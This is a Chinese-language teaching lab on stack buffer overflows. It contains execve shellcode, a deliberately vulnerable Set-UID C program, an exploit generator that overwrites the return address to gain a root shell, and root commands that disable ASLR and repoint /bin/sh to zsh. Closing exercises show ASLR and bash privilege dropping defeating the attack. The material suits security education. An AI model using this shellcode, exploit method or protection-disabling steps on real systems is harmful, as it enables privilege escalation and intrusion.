緩沖區溢出攻擊實驗
一、實驗原理
緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意片段。這一漏洞的出現是由於數據緩沖器和返回地址的暫時關閉,溢出會引起返回地址被重寫。
程序執行映像如下:
| 低地址 | Code | Data | Heap | Stack | 高地址 |
|---|
調用函數時堆棧狀態如下:
| 高地址 | 參數2 | 參數1 | PC | FP | 局部變量1 | 局部變量2 | .... | 臨時空間 | 低地址 |
|---|---|---|---|---|---|---|---|---|---|
| FP($ebp內容) | SP($esp內容) |
緩沖區溢出攻擊借助C語言庫函數strcpy()沒有邊界檢查的漏洞,將存儲攻擊代碼的內存地址覆蓋掉PC的地址,從而使調用過程結束時返回到攻擊代碼(shell code)的存儲地址使攻擊代碼被執行。
二、實驗環境
優麒麟 5.10 64位(ubuntu 20.04.2 LTS x64)
三、實驗准備
實驗環境的是 64 位 Ubuntu linux,而本次實驗為了方便觀察匯編語句,我們需要在 32 位環境下作操作,因此實驗之前需要做一些准備。
sudo apt-get update
sudo apt-get install -y lib32z1 libc6-dev-i386 lib32readline6-dev
sudo apt-get install gdb
四、實驗過程
1、初始設置
- Ubuntu 和其他一些 Linux 系統中,使用地址空間隨機化來隨機堆(heap)和棧(stack)的初始地址,這使得猜測准確的內存地址變得十分困難,而猜測內存地址是緩沖區溢出攻擊的關鍵。因此本次實驗中,我們使用以下命令關閉這一功能:
sudo sysctl -w kernel.randomize_va_space=0
- 為了進一步防范緩沖區溢出攻擊及其它利用 shell 程序的攻擊,許多shell程序在被調用時自動放棄它們的特權。因此,即使你能欺騙一個 Set-UID 程序調用一個 shell,也不能在這個 shell 中保持 root 權限,這個防護措施在 /bin/bash 中實現。linux中,/bin/sh實際是指向 /bin/bash 或 /bin/dash的一個符號鏈接。為了重現這一防護措施被實現之前的情形,我們使用另一個 shell 程序(zsh)代替 /bin/bash。下面的指令描述了如何設置 zsh 程序:
sudo su
cd /bin
rm sh
ln -s zsh sh
exit
2、shellcode
一般情況下,緩沖區溢出會造成程序崩潰,在程序中,溢出的數據覆蓋了返回地址。而如果覆蓋返回地址的數據是另一個地址,那么程序就會跳轉到該地址,如果該地址存放的是一段精心設計的代碼用於實現其他功能,這段代碼就是 shellcode
觀察以下代碼:
#include <stdio.h>
int main()
{
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
本次實驗的 shellcode,就是剛才代碼的匯編版本:
\x31\xc0\x50\x68"//sh"\x68"/bin"\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
3、漏洞程序
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[12];
strcpy(buffer, str);
return 1;
}
int main(int argc, char *argv[])
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char),517, badfile);
bof(str);
printf("Return Properly\n");
return 1;
}
該程序會讀取一個名為“badfile”的文件,並將文件內容裝入“buffer”。
- 輸入命令
linux32,進入32位環境 - 編譯該程序,並設置 SET-UID
sudo gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c
sudo chmod u+s stack
- GCC編譯器有一種棧保護機制來阻止緩沖區溢出,所以我們在編譯代碼時需要用
–fno-stack-protector關閉這種機制。 而-z execstack用於允許執行棧。-g參數是為了使編譯后得到的可執行文檔能用gdb調試。
4、攻擊程序
/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[] =
"\x31\xc0" //xorl %eax,%eax
"\x50" //pushl %eax
"\x68""//sh" //pushl $0x68732f2f
"\x68""/bin" //pushl $0x6e69622f
"\x89\xe3" //movl %esp,%ebx
"\x50" //pushl %eax
"\x53" //pushl %ebx
"\x89\xe1" //movl %esp,%ecx
"\x99" //cdq
"\xb0\x0b" //movb $0x0b,%al
"\xcd\x80" //int $0x80
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??"); //在buffer特定偏移處起始的四個字節覆蓋sellcode地址
strcpy(buffer + 100, shellcode); //將shellcode拷貝至buffer,偏移量設為了 100
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
-
注意上面的代碼,
\x??\x??\x??\x??處需要添上shellcode保存在內存中的地址,因為發生溢出后這個位置剛好可以覆蓋返回(PC)地址。而strcpy(buffer+100,shellcode);這一句又告訴我們,shellcode保存在buffer + 100的位置。 -
現在我們要得到 shellcode 在內存中的地址,輸入命令進入 gdb 調試:
gdb stack r disass main得到如下結果:
-
<+19>執行后的\(esp 值就是 str 的起始地址,所以我們在地址 `0x56556279` 處設置斷點,以獲得`<+19>`執行后的\)esp值。
b *0x56556279
r
i r $esp
-
最后獲得的$esp值
0xffffd2a0就是 str 的地址。 -
根據語句
strcpy(buffer + 100,shellcode);我們計算shellcode的地址為0xffffd2a0+0x64=0xffffd304 -
修改
exploit.c文件,將\x??\x??\x??\x??修改為計算結果\x04\xd3\xff\xff,因為strcpy()在堆棧中是從低地址向高地址復制所以是以反序填入。
5、攻擊結果
-
編譯
exploit.c程序,並依次運行exploit與stack
-
可見通過攻擊獲得了root權限
五、練習
1、通過命令 sudo sysctl -w kernel.randomize_va_space=2 打開系統的地址空間隨機化機制,重復用 exploit 程序攻擊 stack 程序,觀察能否攻擊成功,能否獲得root權限。
可見隨着系統地址空間隨機化機制打開,無法計算出PC所存儲在堆棧中的地址,所以攻擊失敗。
2、將 /bin/sh 重新指向 /bin/bash(或/bin/dash),觀察能否攻擊成功,能否獲得 root 權限。
可見/bin/bash shell可以防止自身在set-uid進程中執行,如果檢測到執行則會將程序用戶ID更改為真實用戶ID,刪除特權,所以攻擊失敗。